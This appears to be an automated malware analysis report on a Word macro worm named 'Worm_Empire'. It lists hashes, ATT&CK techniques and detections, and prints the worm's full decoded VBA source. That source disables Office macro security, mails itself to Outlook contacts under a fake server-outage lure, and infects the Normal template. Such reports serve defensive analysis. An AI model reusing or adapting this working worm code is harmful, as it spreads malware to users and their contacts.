Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1dab557a6faaad28…

MALICIOUS

Office (OLE)

50.0 KB Created: 2000-02-16 02:09:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: a23691f5318da87e1e112c102c25580a SHA-1: 71cb51c4bc892856873cf639d6bc015c3e59edc1 SHA-256: 1dab557a6faaad285e6d7765110fadd8ba13b38b677adde33c0a85d81c528222
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1553.005 Mark-of-the-Web Bypass T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample contains a VBA macro named 'Worm_Empire' that is executed automatically via the Document_Open event. This macro attempts to disable security features and then uses Outlook to email copies of itself to contacts, acting as a worm. The macro also attempts to write to registry keys related to Office security settings.

Heuristics 5

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11363 bytes
SHA-256: 41b58a0cfbbc2182fa3f551854e22296407666b29e735495f431e1830916d2e3
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Worm_Empire"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
    CommandBars("Macro").Controls("Security...").Enabled = False: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
    CommandBars("Tools").Controls("Macro").Enabled = False: Options.ConfirmConversions = False: Options.SaveNormalPrompt = False: Options.VirusProtection = False
End If
Dim OLook, APIName, ABook, Off, Y As Integer, X As Integer, Z As Integer
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Security", "ActiveWorm") <> "Worm Empire" Then
    Set OLook = CreateObject("Outlook.Application"): Set APIName = OLook.GetNameSpace("MAPI")
    If OLook = "Outlook" Then
        APIName.Logon "profile", "password"
        For X = 1 To APIName.AddressLists.Count
            Set ABook = APIName.AddressLists(X): Set Off = OLook.CreateItem(0)
            For Y = 1 To ABook.AddressEntries.Count
                Off.Recipients.Add ABook.AddressEntries(Y): If Y > 50 Then Exit For
            Next Y
            Off.Subject = "Extremely URGENT: To All E-Mail User - " & Date
            Off.Body = "This announcement is for all E-MAIL user. Please take note that our E-Mail Server will down and we recommended you to read the document which attached with this E-Mail."
            Off.Attachments.Add ActiveDocument.FullName: Off.Send
        Next X
        APIName.Logoff
    End If
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Security", "ActiveWorm") = "Worm Empire"
End If
Dim AT, NT, AL As Long, NL As Long, CL As Long
Set AT = ActiveDocument.VBProject.VBComponents.Item(1): Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
AL = AT.CodeModule.CountOfLines: NL = NT.CodeModule.CountOfLines
If NT.Name <> "Worm_Empire" Then
    If NL > 0 Then NT.CodeModule.DeleteLines 1, NL
    NT.CodeModule.AddFromString "Private Sub Document_Close()"
    For CL = 2 To AL
        NT.CodeModule.InsertLines CL, AT.CodeModule.Lines(CL, 1)
    Next CL
    NT.Name = "Worm_Empire"
    If ActiveDocument.ReadOnly = False Then
        ActiveDocument.SaveAs ActiveDocument.FullName
    Else
        ActiveDocument.Saved = True
    End If
End If
If AT.Name <> "Worm_Empire" Then
    If AL > 0 Then AT.CodeModule.DeleteLines 1, AL
    AT.CodeModule.AddFromString "Private Sub Document_Open()"
    For CL = 2 To NL
        AT.CodeModule.InsertLines CL, NT.CodeModule.Lines(CL, 1)
    Next CL
    AT.Name = "Worm_Empire"
    If ActiveDocument.ReadOnly = False Then
        ActiveDocument.SaveAs ActiveDocument.FullName
    Else
        ActiveDocument.Saved = True
    End If
End If
If Day(Date) = 10 And Hour(Time) = 10 Then
    For CL = 1 To 5
        ActiveDocument.SaveAs Day(Date) & Month(Date) & Year(Date) & Second(Time) & CL
    Next CL
    With Selection
        .GoTo wdGoToLine, wdGoToAbsolute, 1
        .Font.Size = 40
        .Font.Underline = wdUnderlineWords
        .Font.Italic = True
        .TypeText "Worm! Let's We Enjoy." & Chr(10)
    End With
End If
End Sub

' Processing file: /opt/analyzer/scan_staging/cbd71f045b5c45d6806f71737abc717f.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Worm_Empire - 10152 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x0000 ""
' 	Ne 
' 	IfBlock 
' Line #3:
' 	LitVarSpecial (False)
' 	LitStr 0x000B "Security..."
' 	LitStr 0x0005 "Macro"
'
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.